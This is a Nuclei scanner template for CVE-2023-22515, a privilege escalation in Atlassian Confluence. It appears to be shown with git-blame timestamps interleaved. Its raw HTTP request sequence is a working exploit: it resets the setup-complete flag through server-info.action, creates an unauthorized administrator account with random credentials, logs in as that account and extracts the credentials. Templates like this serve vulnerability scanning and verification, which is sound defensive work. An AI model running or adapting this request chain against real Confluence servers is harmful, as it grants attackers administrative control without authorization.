2023-10-10 13:20:42 +00:00
id : CVE-2023-22515
info :
name : Atlassian Confluence - Privilege Escalation
author : s1r1us,iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.
2023-10-14 11:27:55 +00:00
remediation : |
Update to the latest version of Confluence
2023-10-10 13:20:42 +00:00
reference :
- https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
- https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html
- https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html
- https://jira.atlassian.com/browse/CONFSERVER-92475
- https://www.cisa.gov/news-events/alerts/2023/10/05/cisa-adds-three-known-exploited-vulnerabilities-catalog
classification :
2023-10-14 11:27:55 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-10-10 13:20:42 +00:00
cve-id : CVE-2023-22515
2023-10-22 12:16:24 +00:00
epss-score : 0.95529
2023-10-31 18:27:55 +00:00
epss-percentile : 0.99182
2023-10-14 11:27:55 +00:00
cpe : cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
2023-10-10 13:20:42 +00:00
metadata :
2023-10-10 14:58:10 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 6
vendor : atlassian
product : confluence_data_center
fofa-query : app="ATLASSIAN-Confluence"
2023-10-10 13:20:42 +00:00
tags : cve,cve2023,confluence,auth-bypass,kev,intrusive
2023-10-10 14:52:53 +00:00
variables :
username : "{{rand_base(10)}}"
password : "{{rand_base(10)}}"
email : "{{username}}@{{password}}"
2023-10-10 13:20:42 +00:00
http :
- raw :
- |
GET /setup/setupadministrator-start.action HTTP/1.1
Host : {{Hostname}}
- |
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1
Host : {{Hostname}}
- |
GET /setup/setupadministrator-start.action HTTP/1.1
Host : {{Hostname}}
- |
@timeout:20s
POST /setup/setupadministrator.action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
X-Atlassian-Token : no -check
2023-10-10 14:52:53 +00:00
username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
2023-10-10 13:20:42 +00:00
- |
POST /dologin.action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
X-Atlassian-Token : no -check
os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action
2023-10-10 14:52:53 +00:00
- |
GET /welcome.action HTTP/1.1
Host : {{Hostname}}
2023-10-10 13:20:42 +00:00
cookie-reuse : true
redirects : true
matchers :
- type : dsl
dsl :
- contains(body_1, 'Setup is already complete')
- contains(body_3, 'Please configure the system administrator account for this Confluence installation')
- contains(location_5, '/index.action')
- status_code_5 == 302
2023-10-10 14:52:53 +00:00
- contains(body_6, 'Administration')
condition : and
extractors :
- type : dsl
dsl :
- '"USER: "+ username'
2023-10-14 11:27:55 +00:00
- '"PASS: "+ password'
2023-11-01 14:45:21 +00:00
# digest: 4a0a004730450220718a79951b923442e614ede7b70855432575774bdfe1f0ca4f1a5551934141ae02210094d8fef3fa89a0fe6bfa18e9b8fa10a1907951e92059db792481328a3631c86f:922c64590222798bb761d5b6d8e72950